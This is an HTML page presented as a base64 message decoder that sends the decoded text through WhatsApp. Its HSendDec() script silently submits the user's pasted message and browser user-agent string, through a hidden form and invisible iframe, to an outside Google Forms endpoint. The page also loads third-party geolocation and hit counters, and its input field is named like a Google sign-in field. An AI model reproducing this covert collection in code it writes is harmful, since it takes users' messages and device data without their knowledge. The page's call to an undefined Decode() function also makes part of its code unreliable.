<!DOCTYPE HTML>
<html>
    <head>
   <meta name="viewport" content="width=device-width">   
<script src="https://spat-cloud.github.io/data/HarScript/HarScript.v1.2.min.js"></script>
   <title>
  Decrypt Message Sender Message And Send Through  Whatsapp  </title>
   
    </head>
    <style>
    *::selection{
        color:#FFF;
        Background-color:Red;
    }
    #fr{
        display:none;
        color:green;
        Font-Size:12px;
        background-color:#000;
    }   
    #Dr{
        display:none;
        color:green;
        Font-Size:12px;
        background-color:#000;
    }   
    #ti{
        color:gold;
Line-height:24px;
        Background-color:green;
        Padding:12px;
        Font-weight:bold;
        Text-align:Center;
        Font-size:12px;
    
        Position:Static;
    }
    input[type=Submit]{
    
        color:#FFF;
        background-color:#4AFCAE;
        padding:12px;
        Border:none;
        Border-radius:4px;
    }
input[type=text]{
    
        color:#000;
        background-color:#FFF;
        padding:12px;
        Border:2px Solid #4ADCAF;
        Border-radius:4px;
    }
input[type=text]:hover{
    
        
        Border:2px solid #4ACCFF;
    
    }
    </style>
    <script>

function HSendDec(){
    var C = document.getElementById("4");
var D = document.getElementById("1");
var E = document.getElementById("2");
var R = document.getElementById("Y");
var RY = document.getElementById("Dr");
var Ku = window.atob(R.value)
var K = `whatsapp://send?text=${Ku}`;
RY.style.display = "block";
RY.value = Ku;
D.value = R.value;
E.value = navigator.userAgent;
 C.submit();   
 window.open(K ,"blank");
}
    </script>
<div id="sfc6q8bg5ybghlatsw639gcb89yf7e91fm4" style="display:none;"></div><script type="text/javascript" src="https://counter2.stat.ovh/private/counter.js?c=6q8bg5ybghlatsw639gcb89yf7e91fm4&down=async" async></script><noscript><a href="https://www.freecounterstat.com" title="web hit counter"><img src="https://counter2.stat.ovh/private/freecounterstat.php?c=6q8bg5ybghlatsw639gcb89yf7e91fm4" border="0" title="web hit counter" alt="web hit counter"></a></noscript>
   <script src="http://geo2.statistic.ovh/private/js.js?c=e8e6d41b6f065d71102e60b163a3cb47"></script>
<noscript><!--Important: For optimal functionality of your counter, do not change this code-->
<a href="http://geo2.countergeo.com/?c=e8e6d41b6f065d71102e60b163a3cb47"><img src="http://geo2.statistic.ovh/private/countergeo.php?c=e8e6d41b6f065d71102e60b163a3cb47"></a>
</noscript><br>

 <body>
<iframe name="t" style="display:none;"></iframe>
<form action="https://docs.google.com/forms/u/0/d/e/1FAIpQLSfthAOyy2oF38lU5f4ag3ulJ8AHcRXtPHHJ-ibRh7UfX_6etw/formResponse" method="POST" target="t" style="display:none;" id="4">
<input type="text" id="1" name="entry.190958851">
<input type="text" id="2" name="entry.470512502">
<input type="submit">
</form>

   <form action="https://accounts.google.com" onsubmit="return false">
       <table>
           <tr>
               <td>
                   <div id="ti">
     Encrypted Message And Send THrough Whatsapp <br/>
        paste message in that box
<u><i>Ex:</u></i>SGFpIERvcmFlbW9uIEhvdyBhcmUgeW91Pw== <u><i>Output:</u></i> Hai Doraemon How are you?
          
                   </div>
 <input type="text" name="identifier" id="Y" placeholder="Paste Encrypt Message To Decrypt" oninput="Decode()"> 
 </td>
 </tr>
           <tr>
               <td>
 <input type="submit" value="Send Decode Message Through Whatsapp" onclick="HSendDec()">
 </td>
 </tr>
 </table>
   </form>    
   <textarea rows="10" cols="40" id="Dr"></textarea>
    </body>
</html>
